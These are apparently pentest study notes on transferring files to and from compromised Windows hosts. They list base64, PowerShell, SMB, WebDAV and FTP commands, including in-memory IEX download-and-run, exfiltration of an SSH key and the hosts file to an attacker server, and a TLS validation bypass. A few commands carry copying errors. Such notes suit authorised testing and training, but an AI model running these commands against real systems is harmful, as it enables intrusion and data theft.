Pentest Notes / File Transfers
Windows File Transfer
In this section
Download
Base64 Download
Get the md5 hash - for verification
md5sum id_rsa
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
Encode to base64 - attacker
cat id_rsa |base64 -w 0
-w 0 disables line wrapping
Decode from base64 - target
[IO.File]::WriteAllBytes("C:\Users\Public\decode_file", [Convert]::FromBase64String("base64_text"))
Powershell Download
Download file
(New-Object Net.WebClient).DownloadFile('[Target File URL]','[Output File Name]')
Download string - fileless method
Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression or IEX alias
IEX (New-Object Net.WebClient).DownloadString('[Output File Name]')
iwr, curl, wget or:
Invoke-WebRequest [Target File URL] -OutFile [Output File Name]
Common errors
• Incomplete internet explorer launch config
Invoke-WebRequest https://
• SSL/TLS secure channel certificate is not trusted
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
SMB Download
Create SMB server - attacker
sudo impacket-smbserver share -smb2support /tmp/smbshare
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Mount the SMB server with username and passwd - target
net use n: \[ATTACKER_IP]\share /user:test test
Copy file from SMB server - target
copy \[ATTACKER_IP]\share\nc.exe
FTP Download
Set up FTP server
sudo pip3 install pyftpdlib --break-system-packages
sudo python3 -m pyftpdlib --port 21
Create a Command File for the FTP Client and Download the Target File : https://academy.hackthebox.com/app/module/24/section/160
If the shell we get is not interactive as we might have to log in
Transfer files from FTP Server
(New-Object Net.WebClient).DownloadFile('ftp://[MACHINE_IP]/[file.txt]', 'C:\Users\Public\ftp-file.txt')
Upload
Base64 Upload
Get the md5 hash - for verification
md5sum id_rsa
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5
Encode to base64 - target
[Convert]::ToBase64String((Get-Content -path "[full_path_of_file]" -Encoding byte))
Decode from base64 - attacker
echo "base64_text" | base64 -d
Powershell Upload
Powershell does not have built-in upload function
In target:
pip3 install uploadserver
python3 -m uploadserver
Script to upload a file to python upload server:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://[MACHINE_IP]:8000/upload -File [file_to_be_uploaded]
Powershell and Base64 Web - target
$b64 = [System.convert]::ToBase64String((Get-Content -Path '[full_path_of_file]' -Encoding Byte))
Invoke-WebRequest -Uri http://[MACHINE_IP]:8000/ -Method POST -Body $b64
Use nc to catch the base64 data - attacker
nc -lvnp 8000
SMB Upload
Moslty SMB, port 445 will be disabled, therefore, we use the python module WebDAV
If no restrictions: Use impacket-smbserver : in download
Install, run in target directory - target
sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Connect to WebDAV share - attacker
dir \192.168.49.128\DavWWWRoot
DavWWWRoot : Special keyword recognised by windows shell, it doesn't exit. Replace it with the folder name shown when above command is run
Upload files using SMB
copy C:\Users\john\Desktop\SourceCode.zip \[MACHINE_IP]\DavWWWRoot</span>
copy C:\Users\john\Desktop\SourceCode.zip \[MACHINE_IP]\sharefolder</span>
FTP Upload
Start Python FTP Server
sudo python3 -m pyftpdlib --port 21 --write
PowerShell Upload File
(New-Object Net.WebClient).UploadFile('ftp://[MACHINE_IP]/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')